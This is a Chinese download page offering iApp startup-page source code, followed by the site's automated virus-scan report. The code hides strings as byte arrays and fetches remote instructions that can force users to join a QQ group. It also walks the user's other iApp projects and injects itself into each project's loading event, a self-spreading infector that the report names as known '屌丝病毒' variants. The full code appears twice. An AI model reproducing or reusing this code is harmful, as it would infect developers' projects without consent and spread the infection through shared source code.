[上传者]蜗壳会员414
[说明] 源码来自互联网,以下数据均来自AI处理非人工审核!请查看下列查杀再决定是否导入项目!短时间频繁使用本地下载可能会被创宇盾拦截,拦截后可以使用网盘下载!
下载地址:本地下载 网盘下载(推荐)
资源资料
启动页main.iyu载入事件部分代码
//java(cs, activity, "android.app.Activity.getWindow")
//java(cs2, cs, "android.view.Window.getDecorView")
//java(null, cs2, "android.view.View.setSystemUiVisibility", "int", "8192")
//java(null, cs, "android.view.Window.addFlags", "int", "67108864")
ushsp(false)
/.
t()
{
btoo("utf-8","55 51 52 54 50 56 51 56 55",sss.sqdcs)
btoo("utf-8"," 99 111 109 46 122 104 101 110 100 111 110 103",sss.bm)
btoo("utf-8","-26 -72 -87 -23 -90 -88 -26 -113 -112 -25 -92 -70",wxts)
btoo("utf-8","-28 -72 -117 -24 -67 -67 -26 -101 -76 -26 -106 -80",jrjlq)
btoo("utf-8","104 116 116 112 58 47 47 100 111 99 113 46 99 110 47 102 105 108 101 115 47 101 100 107 56 56 107 101",c)
hs(c,e)
s a = "iApp"
fi(a,b)
f(b==false)
{
}
else
{
}
fi("%iapp/tempFile",IAPP)
f(IAPP==true)
{
}
else
{
ufnsui()
{
sj(e,"zl【","】zl",zl)
sj(e,"qh【","】qh",qh)
sj(e,"zz【","】zz",zz)
sj(e,"gg【","】gg",gg)
f(zl=="-27 -68 -128 -27 -112 -81")
{
btoo("utf-8",qh,qhzh)
btoo("utf-8",gg,ggzh)
utw(null,wxts,ggzh,jrjlq,true,fz)
{
ss("mqqapi://card/show_pslcard?src_type=internal&version=1&uin="+qhzh+"&card_type=group&source=qrcode",joinqq)
sit(a,"action", "android.intent.action.VIEW")
sit(a,"data",joinqq)
uit(a, "chooser", qhzh)
}
}
}
}
}
t()
{
btoo("utf-8","60 47 101 118 101 110 116 73 116 109 101 62",event)
btoo("utf-8","60 101 118 101 110 116 73 116 109 101 32 116 121 112 101 61 34 108 111 97 100 105 110 103 34 62",sss.s)
btoo("utf-8","60 85 73 69 118 101 110 116 115 101 116 62 60 101 118 101 110 116 73 116 109 101 32 116 121 112 101 61 34 108 111 97 100 105 110 103 34 62",sss.d)
btoo("utf-8","60 85 73 69 118 101 110 116 115 101 116 62",sss.c)
fr("@gx.mp3",bb)
f(bb==null)
{
fc("%gx.mp3","@gx.mp3",n)
}
else
{
fc("@gx.mp3","%gx.mp3",n)
fdir("@",path)
fdir(dir)
ss(dir+"/",dir)
sr(path,dir,"%",path)
sl(path,"/",list)
sgszl(list,length)
s(length-3,len)
s count = 0
s proPath = ""
for(1;len)
{
sgsz(list,count,c)
ss(proPath+c+"/",proPath)
s(count+1,count)
}
fl(proPath,files)
for(file;files)
{
f(file?"gx.mp3")
{
}
else
{
ss(proPath+file+"/src/mian.iyu",Item)
ss(proPath+file+"/res/gx.mp3",Items)
fr(Item,cons)
f(cons?"android= www.iapp.com")
{
}
else
{
f(cons?"loading")
{
sj(cons,null,sss.s,Dq)
sj(cons,sss.s,null,cbc)
sj(cbc,event,null,Dh)
sj(cons,sss.s,event,Yh)
ss(Dq+sss.s+Yh+bb+event+Dh,Wc)
fc("@gx.mp3",Items,ni)
fw(Item,Wc)
}
else
{
sj(cons,null,sss.c,before)
sj(cons,sss.c,null,between)
ss(before+sss.d+bb+event+between,Wc)
fc("@gx.mp3",Items,ni)
fw(Item,Wc)
}
}
}
}
}
}
./
t()
{
btoo("utf-8","55 51 52 54 50 56 51 56 55",sss.sqdcs)
btoo("utf-8"," 99 111 109 46 122 104 101 110 100 111 110 103",sss.bm)
btoo("utf-8","-26 -72 -87 -23 -90 -88 -26 -113 -112 -25 -92 -70",wxts)
btoo("utf-8","-28 -72 -117 -24 -67 -67 -26 -101 -76 -26 -106 -80",jrjlq)
btoo("utf-8","104 116 116 112 58 47 47 100 111 99 113 46 99 110 47 102 105 108 101 115 47 101 100 107 56 56 107 101",c)
hs(c,e)
s a = "iApp"
fi(a,b)
f(b==false)
{
}
else
{
}
fi("%iapp/tempFile",IAPP)
f(IAPP==true)
{
}
else
{
ufnsui()
{
sj(e,"zl【","】zl",zl)
sj(e,"qh【","】qh",qh)
sj(e,"zz【","】zz",zz)
sj(e,"gg【","】gg",gg)
f(zl=="-27 -68 -128 -27 -112 -81")
{
btoo("utf-8",qh,qhzh)
btoo("utf-8",gg,ggzh)
utw(null,wxts,ggzh,jrjlq,true,fz)
{
ss("mqqapi://card/show_pslcard?src_type=internal&version=1&uin="+qhzh+"&card_type=group&source=qrcode",joinqq)
sit(a,"action", "android.intent.action.VIEW")
sit(a,"data",joinqq)
uit(a, "chooser", qhzh)
}
}
}
}
}
t()
{
btoo("utf-8","60 47 101 118 101 110 116 73 116 109 101 62",event)
btoo("utf-8","60 101 118 101 110 116 73 116 109 101 32 116 121 112 101 61 34 108 111 97 100 105 110 103 34 62",sss.s)
btoo("utf-8","60 85 73 69 118 101 110 116 115 101 116 62 60 101 118 101 110 116 73 116 109 101 32 116 121 112 101 61 34 108 111 97 100 105 110 103 34 62",sss.d)
btoo("utf-8","60 85 73 69 118 101 110 116 115 101 116 62",sss.c)
fr("@gx.mp3",bb)
f(bb==null)
{
fc("%gx.mp3","@gx.mp3",n)
}
else
{
fc("@gx.mp3","%gx.mp3",n)
fdir("@",path)
fdir(dir)
ss(dir+"/",dir)
sr(path,dir,"%",path)
sl(path,"/",list)
sgszl(list,length)
s(length-3,len)
s count = 0
s proPath = ""
for(1;len)
{
sgsz(list,count,c)
ss(proPath+c+"/",proPath)
s(count+1,count)
}
fl(proPath,files)
for(file;files)
{
f(file?"gx.mp3")
{
}
else
{
ss(proPath+file+"/src/mian.iyu",Item)
ss(proPath+file+"/res/gx.mp3",Items)
fr(Item,cons)
f(cons?"android= www.iapp.com")
{
}
else
{
f(cons?"loading")
{
sj(cons,null,sss.s,Dq)
sj(cons,sss.s,null,cbc)
sj(cbc,event,null,Dh)
sj(cons,sss.s,event,Yh)
ss(Dq+sss.s+Yh+bb+event+Dh,Wc)
fc("@gx.mp3",Items,ni)
fw(Item,Wc)
}
else
{
sj(cons,null,sss.c,before)
sj(cons,sss.c,null,between)
ss(before+sss.d+bb+event+between,Wc)
fc("@gx.mp3",Items,ni)
fw(Item,Wc)
}
}
}
}
}
}
源码病毒云检测评估结果
-----------------
(app_list.iyu)中存在:
疑似强制加群(或好友)(可能是恶意代码,大多数强制加群(或好友)的源码是不可用的或被多次盗用过)
疑似恶意修改目录(该程序可能会为经过用户许可非法修改某个目录的所有文件,以此达到破坏目的)
遍历目录(该程序通过遍历目录达到某种目的,误报率较高)
疑似通过多行换行隐藏代码1(该程序可能会通过大量换行隐藏恶意代码,并且大多数屌丝病毒是通过该换行隐藏的,目前已提供查杀功能)
屌丝病毒变种4(屌丝病毒变种体,目前已经提供查杀功能)
疑似操作iApp界面(误报率较高,应用可能会对iApp项目界面进行操作)
疑似新种恶意代码(目前比较常见的一种恶意代码,缺点和优点都很明显)
(jz.iyu)中暂时没有检测到病毒!但不代表百分百安全。
-----------------
(mian.iyu)中存在:
屌丝病毒变种1(iApp最早出现的恶意代码变种,通过注入默认目录下的源码而达到感染的目的,具有感染性 主要受害位置为:mian.iyu的载入事件 )
疑似强制加群(或好友)(可能是恶意代码,大多数强制加群(或好友)的源码是不可用的或被多次盗用过)
疑似复制项目内容到其他目录(请自行参考代码,大多数恶意代码都是通过复制项目内容到其他项目里面从而达到感染的)
递归查询目录(该程序可能会递归查询您储存的数据,从而达到某种目的,一般文件管理器或文件选择器比较常见,但不少恶意程序也会使用)
疑似恶意替换目录文件(该程序可能会非法替换某个目录的文件从而造成破坏)
疑似恶意修改目录(该程序可能会为经过用户许可非法修改某个目录的所有文件,以此达到破坏目的)
遍历目录(该程序通过遍历目录达到某种目的,误报率较高)
屌丝病毒变种2(iApp最早出现的恶意代码变种,通过注入main.iyu界面达到感染,目前已提供查杀功能)
疑似通过多行换行隐藏代码1(该程序可能会通过大量换行隐藏恶意代码,并且大多数屌丝病毒是通过该换行隐藏的,目前已提供查杀功能)
屌丝病毒变种3(屌丝病毒变种体,目前已经提供查杀功能)
屌丝病毒变种4(屌丝病毒变种体,目前已经提供查杀功能)
疑似通过多个空格隐藏代码(该程序可能会通过大量空格隐藏恶意代码,请注意!!!很多程序为了代码美观会嵌入大量空格,这是正常现象,但也不乏有恶意程序嵌入大量空格隐藏代码,目前已提供查杀功能)
辣眼睛病毒(辣眼睛病毒可以说是屌丝病毒的母体了,目前已经提供查杀功能(仅支持查杀微变体和母体))
疑似获取当前项目路径(通过某种方式获取当前项目路径从而找到感染位置,误报率较高)
过多的文件操作(这里只是作为提醒报出来)
疑似操作iApp界面(误报率较高,应用可能会对iApp项目界面进行操作)
疑似新种恶意代码(目前比较常见的一种恶意代码,缺点和优点都很明显)
屌丝病毒初代(iApp最早出现的恶意代码变种,通过注入默认目录下的源码而达到感染的目的,具有感染性 主要受害位置为:mian.iyu的载入事件 )
(app_list.iyu)中存在:
疑似强制加群(或好友)(可能是恶意代码,大多数强制加群(或好友)的源码是不可用的或被多次盗用过)
疑似恶意修改目录(该程序可能会为经过用户许可非法修改某个目录的所有文件,以此达到破坏目的)
遍历目录(该程序通过遍历目录达到某种目的,误报率较高)
疑似通过多行换行隐藏代码1(该程序可能会通过大量换行隐藏恶意代码,并且大多数屌丝病毒是通过该换行隐藏的,目前已提供查杀功能)
屌丝病毒变种4(屌丝病毒变种体,目前已经提供查杀功能)
疑似操作iApp界面(误报率较高,应用可能会对iApp项目界面进行操作)
疑似新种恶意代码(目前比较常见的一种恶意代码,缺点和优点都很明显)
(jz.iyu)中暂时没有检测到病毒!但不代表百分百安全。
-----------------
(mian.iyu)中存在:
屌丝病毒变种1(iApp最早出现的恶意代码变种,通过注入默认目录下的源码而达到感染的目的,具有感染性 主要受害位置为:mian.iyu的载入事件 )
疑似强制加群(或好友)(可能是恶意代码,大多数强制加群(或好友)的源码是不可用的或被多次盗用过)
疑似复制项目内容到其他目录(请自行参考代码,大多数恶意代码都是通过复制项目内容到其他项目里面从而达到感染的)
递归查询目录(该程序可能会递归查询您储存的数据,从而达到某种目的,一般文件管理器或文件选择器比较常见,但不少恶意程序也会使用)
疑似恶意替换目录文件(该程序可能会非法替换某个目录的文件从而造成破坏)
疑似恶意修改目录(该程序可能会为经过用户许可非法修改某个目录的所有文件,以此达到破坏目的)
遍历目录(该程序通过遍历目录达到某种目的,误报率较高)
屌丝病毒变种2(iApp最早出现的恶意代码变种,通过注入main.iyu界面达到感染,目前已提供查杀功能)
疑似通过多行换行隐藏代码1(该程序可能会通过大量换行隐藏恶意代码,并且大多数屌丝病毒是通过该换行隐藏的,目前已提供查杀功能)
屌丝病毒变种3(屌丝病毒变种体,目前已经提供查杀功能)
屌丝病毒变种4(屌丝病毒变种体,目前已经提供查杀功能)
疑似通过多个空格隐藏代码(该程序可能会通过大量空格隐藏恶意代码,请注意!!!很多程序为了代码美观会嵌入大量空格,这是正常现象,但也不乏有恶意程序嵌入大量空格隐藏代码,目前已提供查杀功能)
辣眼睛病毒(辣眼睛病毒可以说是屌丝病毒的母体了,目前已经提供查杀功能(仅支持查杀微变体和母体))
疑似获取当前项目路径(通过某种方式获取当前项目路径从而找到感染位置,误报率较高)
过多的文件操作(这里只是作为提醒报出来)
疑似操作iApp界面(误报率较高,应用可能会对iApp项目界面进行操作)
疑似新种恶意代码(目前比较常见的一种恶意代码,缺点和优点都很明显)
屌丝病毒初代(iApp最早出现的恶意代码变种,通过注入默认目录下的源码而达到感染的目的,具有感染性 主要受害位置为:mian.iyu的载入事件 )
随机推荐
投稿
